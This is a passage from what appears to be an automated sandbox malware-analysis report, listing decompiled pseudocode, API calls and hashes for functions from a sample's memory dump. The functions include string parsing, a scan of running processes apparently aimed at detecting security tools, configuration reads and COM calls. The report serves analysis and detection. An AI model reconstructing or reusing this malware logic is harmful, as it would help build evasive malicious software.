				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04E9A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4e9c284); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4e9c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x04e9487a
0x04e9487e
0x04e94880
0x04e94881
0x04e94889
0x04e94889
0x04e9488d
0x00000000
0x00000000
0x04e94884
0x04e94885
0x04e94888
0x04e94888
0x04e94895
0x04e9489a
0x04e948a0
0x04e948a8
0x04e948ae
0x04e948b0
0x04e948b5
0x04e948b9
0x04e948bb
0x04e948be
0x04e948c5
0x04e948c5
0x04e948cf
0x04e948d2
0x04e948d3
0x04e948d5
0x04e948e1
0x04e948e1
0x04e948ee

APIs

StrChrA.SHLWAPI(?,00000020,00000000,058495AC,?,04E95D25,?,04E9243F,058495AC,?,04E95D25), ref: 04E94889
StrTrimA.KERNELBASE(?,04E9C284,00000002,?,04E95D25,?,04E9243F,058495AC,?,04E95D25), ref: 04E948A8
StrChrA.SHLWAPI(?,00000020,?,04E95D25,?,04E9243F,058495AC,?,04E95D25), ref: 04E948B3
StrTrimA.SHLWAPI(00000001,04E9C284,?,04E95D25,?,04E9243F,058495AC,?,04E95D25), ref: 04E948C5

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 778af75e2dba24504c01ee64766b8cbef9a2889c4b25775691b3686e9e5a5016
Instruction ID: 5c64886765584c2adb307238d62a6f70e4de6e0f4a38adfda76e052694e71c81
Opcode Fuzzy Hash: 778af75e2dba24504c01ee64766b8cbef9a2889c4b25775691b3686e9e5a5016
Instruction Fuzzy Hash: 4701F572609361ABD7309F668C48E27BBDCEF45A55F111619F941C72C0EB70EC0286B0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A65C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04E9A65C() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4e9d2a8; // 0x9aa5a8
						_t2 = _t9 + 0x4e9ee34; // 0x73617661
						_push( &_v264);
						if( *0x4e9d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x04e9a667
0x04e9a66c
0x04e9a671
0x04e9a675
0x04e9a67f
0x04e9a6b0
0x04e9a686
0x04e9a68b
0x04e9a698
0x04e9a6a1
0x04e9a6b8
0x04e9a6a3
0x04e9a6ab
0x00000000
0x04e9a6ab
0x04e9a6b9
0x04e9a6ba
0x00000000
0x04e9a6ba
0x00000000
0x04e9a6b4
0x04e9a6c0
0x04e9a6c5

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04E9A66C
Process32First.KERNEL32(00000000,?), ref: 04E9A67F
Process32Next.KERNEL32(00000000,?), ref: 04E9A6AB
FindCloseChangeNotification.KERNELBASE(00000000), ref: 04E9A6BA

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 0f6f04e54925c26226f9ec61abdfd55184550f70c043f6a161a5b44fef105f1c
Instruction ID: 34b10821a5eb97d71d05fe8aff22a5a67e1a79415d0670b7d73e6e4add2cee4d
Opcode Fuzzy Hash: 0f6f04e54925c26226f9ec61abdfd55184550f70c043f6a161a5b44fef105f1c
Instruction Fuzzy Hash: B6F0F0322050256BEF20BAA79C48DEB77ECDF85219F001162EA05C21C1EE24EE4587A1

Uniqueness

Uniqueness Score: -1.00%

Function 04E98D14, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E98D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04E9A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4e9d2a8; // 0x9aa5a8
				_t4 = _t24 + 0x4e9edc0; // 0x5849368
				_t5 = _t24 + 0x4e9ed68; // 0x4f0053
				_t26 = E04E95356( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4e9d2a8; // 0x9aa5a8
						_t11 = _t32 + 0x4e9edb4; // 0x584935c
						_t48 = _t11;
						_t12 = _t32 + 0x4e9ed68; // 0x4f0053
						_t52 = E04E945C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4e9d2a8; // 0x9aa5a8
							_t13 = _t35 + 0x4e9edfe; // 0x30314549
							_t37 = E04E98E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4e9d25c - 6;
								if( *0x4e9d25c <= 6) {
									_t42 =  *0x4e9d2a8; // 0x9aa5a8
									_t15 = _t42 + 0x4e9ec0a; // 0x52384549
									E04E98E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4e9d2a8; // 0x9aa5a8
							_t17 = _t38 + 0x4e9edf8; // 0x58493a0
							_t18 = _t38 + 0x4e9edd0; // 0x680043
							_t45 = E04E95D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4e9d238, 0, _t52);
						}
					}
					HeapFree( *0x4e9d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04E94F14(_t54);
				}
				return _t45;
			}

0x04e98d14
0x04e98d24
0x04e98d27
0x04e98d2e
0x04e98d30
0x04e98d30
0x04e98d33
0x04e98d38
0x04e98d3f
0x04e98d4c
0x04e98d51
0x04e98d55
0x04e98d63
0x04e98d71
0x04e98d75
0x04e98e06
0x04e98e06
0x04e98d7b
0x04e98d7b
0x04e98d80
0x04e98d80
0x04e98d87
0x04e98d93
0x04e98d95
0x04e98d97
0x04e98d99
0x04e98da0
0x04e98dab
0x04e98db2
0x04e98db4
0x04e98dbb
0x04e98dbd
0x04e98dc4
0x04e98dcf
0x04e98dcf
0x04e98dbb
0x04e98dd4
0x04e98dd9
0x04e98de0
0x04e98dfe
0x04e98e00
0x04e98e00
0x04e98d97
0x04e98e12
0x04e98e12
0x04e98e14
0x04e98e19
0x04e98e1b
0x04e98e1b
0x04e98e26

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05849368,00000000,?,73BCF710,00000000,73BCF730), ref: 04E98D63
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058493A0,?,00000000,30314549,00000014,004F0053,0584935C), ref: 04E98E00
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04E9523E), ref: 04E98E12

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7b01955dc9ea00c82fa0ee04cc09f9b111ca303679038594ae2d071a74e41361
Instruction ID: 68c378321622d769ce36138bcf9e152e91c21a96f256670b4940a620a86d0bf6
Opcode Fuzzy Hash: 7b01955dc9ea00c82fa0ee04cc09f9b111ca303679038594ae2d071a74e41361
Instruction Fuzzy Hash: 7A319172910119BFEF15EFA5DC44EDA7BFDEB45708F180166A601970E0D770AE48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A376, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E04E9A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x4e9d340; // 0x5849a88
				_push(0x800);
				_push(0);
				_push( *0x4e9d238);
				if( *0x4e9d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x4e9d24c =  *0x4e9d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04E97306(_t44, _t40); // executed
						_t18 = E04E94A09(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x4e9d24c < 5) {
								 *0x4e9d24c =  *0x4e9d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04E96761();
						RtlFreeHeap( *0x4e9d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E04E91F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E04E94AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x04e9a376
0x04e9a376
0x04e9a379
0x04e9a37a
0x04e9a384
0x04e9a38b
0x04e9a390
0x04e9a392
0x04e9a398
0x04e9a3c0
0x04e9a3d8
0x04e9a3da
0x04e9a3db
0x04e9a3dd
0x04e9a41b
0x04e9a41b
0x04e9a421
0x04e9a427
0x04e9a427
0x04e9a3df
0x04e9a3e5
0x04e9a3e8
0x04e9a3f7
0x04e9a3f9
0x04e9a400
0x04e9a434
0x04e9a439
0x04e9a43b
0x04e9a43d
0x04e9a43d
0x00000000
0x04e9a43b
0x04e9a402
0x04e9a407
0x04e9a415
0x00000000
0x04e9a415
0x04e9a3cf
0x04e9a3d4
0x04e9a3d4
0x00000000
0x04e9a3d4
0x04e9a39a
0x04e9a3a2
0x00000000
0x00000000
0x04e9a3b1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 04E9A39A

Part of subcall function 04E94AB6: GetTickCount.KERNEL32 ref: 04E94ACA
Part of subcall function 04E94AB6: wsprintfA.USER32 ref: 04E94B1A
Part of subcall function 04E94AB6: wsprintfA.USER32 ref: 04E94B37
Part of subcall function 04E94AB6: wsprintfA.USER32 ref: 04E94B63
Part of subcall function 04E94AB6: HeapFree.KERNEL32(00000000,?), ref: 04E94B75
Part of subcall function 04E94AB6: wsprintfA.USER32 ref: 04E94B96
Part of subcall function 04E94AB6: HeapFree.KERNEL32(00000000,?), ref: 04E94BA6
Part of subcall function 04E94AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04E94BD4
Part of subcall function 04E94AB6: GetTickCount.KERNEL32 ref: 04E94BE5

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 04E9A3B8
RtlFreeHeap.NTDLL(00000000,00000002,04E95289,?,04E95289,00000002,?,?,04E95D5E,?), ref: 04E9A415

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 672e5522fb796bf25a1ae4bc73b066d08c754a3c041863c6fbcfe97058d365ac
Instruction ID: ac240146ed72f3097649cb0d11e0369485298c02760592ad06f932c7e4e620aa
Opcode Fuzzy Hash: 672e5522fb796bf25a1ae4bc73b066d08c754a3c041863c6fbcfe97058d365ac
Instruction Fuzzy Hash: 4F213971200215EBEF11DF9ADC84EAA77ECEF48345F105026F9019B2C0EB74ED459BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E91DF4, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E04E91DF4(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x4e9d238, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E04E9A749(_t57 - _a4, _a4, _t48);
							_t38 = E04E9A749(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E04E9A749(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x04e91dfc
0x04e91dff
0x04e91e01
0x04e91e0a
0x04e91e1c
0x04e91e1c
0x04e91e20
0x04e91e22
0x04e91e25
0x04e91e28
0x04e91e31
0x04e91e3b
0x04e91e3f
0x04e91e44
0x04e91e54
0x04e91e5a
0x04e91e5e
0x04e91ead
0x04e91e60
0x04e91e60
0x04e91e69
0x04e91e78
0x04e91e7d
0x04e91e8a
0x04e91e93
0x04e91e9e
0x04e91ea5
0x04e91ea9
0x04e91ea9
0x04e91e5e
0x04e91eb4
0x04e91ebb

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 04E91E28
StrStrA.SHLWAPI(00000000,?), ref: 04E91E35
RtlAllocateHeap.NTDLL(00000000,?), ref: 04E91E54

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: 7db0e1061dc24da401186ab363812f5fccb93d0eccfedd81918f626ec5bd5ca5
Instruction ID: e1ba4e12235eae5eb1ad26b13ad1ba9890f0e9b0ea38bf9efedf3b463943be3d
Opcode Fuzzy Hash: 7db0e1061dc24da401186ab363812f5fccb93d0eccfedd81918f626ec5bd5ca5
Instruction Fuzzy Hash: EF214C3660025AAFDF01DF6AC884B9EBFB5EF84214F048255EC049B345CB34ED15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A273, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E04E9A273(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E04E96891(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x4e9d2a8; // 0x9aa5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x4e9e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x4e9e8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E04E9A62D();
					_push( &_v64);
					if( *0x4e9d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E04E9A62D();
				}
				return _t28;
			}

0x04e9a273
0x04e9a27a
0x04e9a283
0x04e9a288
0x04e9a28c
0x04e9a296
0x04e9a29b
0x04e9a2a0
0x04e9a2a5
0x04e9a2af
0x04e9a2b9
0x04e9a2b9
0x04e9a2b1
0x04e9a2b1
0x04e9a2b1
0x04e9a2b1
0x04e9a2bf
0x04e9a2c5
0x04e9a2c6
0x04e9a2c9
0x04e9a2cc
0x04e9a2cf
0x04e9a2d7
0x04e9a2e0
0x04e9a2e8
0x04e9a2e8
0x04e9a2ea
0x04e9a2ec
0x04e9a2ec
0x04e9a2f6

APIs

Part of subcall function 04E96891: SysAllocString.OLEAUT32(00000000), ref: 04E968EB
Part of subcall function 04E96891: SysAllocString.OLEAUT32(0070006F), ref: 04E968FF
Part of subcall function 04E96891: SysAllocString.OLEAUT32(00000000), ref: 04E96911

memset.NTDLL ref: 04E9A296
GetLastError.KERNEL32 ref: 04E9A2E2

Strings

<, xrefs: 04E9A2A5

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <
API String ID: 3736384471-4251816714
Opcode ID: a9a85b198a0a7f15f8604c27c38020ba1e56158addfde8777d29fc4527dcfd43
Instruction ID: 93bbd8e11f796216829f1cfdd2c02f7b3d694d5b2d1185d14d275e8312c31591
Opcode Fuzzy Hash: a9a85b198a0a7f15f8604c27c38020ba1e56158addfde8777d29fc4527dcfd43
Instruction Fuzzy Hash: 47011B71E00258ABDB11EFA9D884EDEBBECEF08744F445126F904E7180E734ED448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E91526, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E91526(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E04E9A71F(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x4e9d2d8, 0x90);
					_t27 =  *0x4e9d2dc; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04E91709(0x90, _a4, _t27, 0);
					}
					if(E04E914F3( &_v36) != 0) {
						_t35 = E04E937B8(0x90, _a4,  &_v20,  &_v12,  &_v36, 0); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E04E94776(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875c6
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E04E9A734(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E04E9A734(_a4);
				}
				return _v16;
			}

0x04e9152c
0x04e91531
0x04e9153e
0x04e91541
0x04e91544
0x04e91549
0x04e9154e
0x04e9155c
0x04e91561
0x04e91566
0x04e9156b
0x04e9156d
0x04e91575
0x04e91575
0x04e91584
0x04e91599
0x04e915a0
0x04e915a7
0x04e915ad
0x04e915b3
0x04e915bb
0x04e915c1
0x04e915c4
0x04e915d1
0x04e915d6
0x04e915da
0x04e915da
0x04e915a0
0x04e915e5
0x04e915f0
0x04e915f0
0x04e915fc

APIs

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

memcpy.NTDLL(00000000,00000090,00000002,00000002,04E95289,00000008,04E95289,04E95289,?,04E9A3FE,04E95289), ref: 04E9155C
memset.NTDLL ref: 04E915D1
memset.NTDLL ref: 04E915E5

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 86f087b23506bebc9384408069c28c27e12aeabbe2a81cce33a349b1c7ff52c1
Instruction ID: de589c79b53cd4b8f1cdf4157cebc49d27a819f1cdabd8b4a68e426d40e259ff
Opcode Fuzzy Hash: 86f087b23506bebc9384408069c28c27e12aeabbe2a81cce33a349b1c7ff52c1
Instruction Fuzzy Hash: C3212F76A00259BBEF11AF65CC41FDEBBF9AF08254F044025F904E6291EB34EE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E96096, Relevance: 3.1, APIs: 2, Instructions: 149
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04E96096(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x4e9d2a8; // 0x9aa5a8
				_t4 = _t49 + 0x4e9e450; // 0x58489f8
				_t82 = 0;
				_t5 = _t49 + 0x4e9e440; // 0x9ba05972
				_t51 =  *0x4e9d158(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x4e9d2a8; // 0x9aa5a8
						_t30 = _t56 + 0x4e9e430; // 0x58489d8
						_t31 = _t56 + 0x4e9e460; // 0x4c96be40
						_t58 =  *0x4e9d0f8(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x4e9d2a8; // 0x9aa5a8
											_t23 = _t77 + 0x4e9e430; // 0x58489d8
											_t24 = _t77 + 0x4e9e460; // 0x4c96be40
											_t106 =  *0x4e9d0f8(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x4e9d2a8; // 0x9aa5a8
													_t67 = _v28;
													_t40 = _t100 + 0x4e9e420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}

0x04e960a1
0x04e960a8
0x04e960a9
0x04e960aa
0x04e960ab
0x04e960b1
0x04e960b6
0x04e960bf
0x04e960c2
0x04e960c9
0x04e960cf
0x04e960d3
0x04e960d9
0x04e960e1
0x04e960e2
0x04e960e7
0x04e960e8
0x04e960ea
0x04e960ed
0x04e960ee
0x04e960ef
0x04e960f5
0x04e9618b
0x04e96190
0x04e96197
0x04e961a1
0x04e961a7
0x04e961a9
0x04e961af
0x00000000
0x04e960fb
0x04e960fb
0x04e96102
0x04e9610b
0x04e9610f
0x04e96115
0x04e96118
0x04e96180
0x00000000
0x04e9611a
0x04e9611a
0x04e961b2
0x04e961b4
0x00000000
0x00000000
0x04e96120
0x04e96120
0x04e96122
0x04e96127
0x04e9612b
0x04e9612e
0x04e96133
0x04e9613b
0x04e9613c
0x04e9613d
0x04e9613f
0x04e96143
0x04e96147
0x00000000
0x04e96149
0x04e9614d
0x04e96152
0x04e96159
0x04e96169
0x04e9616b
0x04e96171
0x04e96176
0x04e961b6
0x04e961b6
0x04e961c3
0x04e961c7
0x04e961cc
0x04e961d2
0x04e961d7
0x04e961e1
0x04e961e3
0x04e961e9
0x04e961e9
0x04e961ec
0x04e961f2
0x00000000
0x00000000
0x00000000
0x04e96176
0x00000000
0x04e96178
0x04e96178
0x04e96179
0x00000000
0x04e9617e
0x04e9611a
0x04e96118
0x04e9610f
0x04e961f5
0x04e961f5
0x04e961fb
0x04e961fb
0x04e96204

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058489D8,04E968BF,?,?,?,?,?,?,?,?,?,?,?,04E968BF), ref: 04E96163
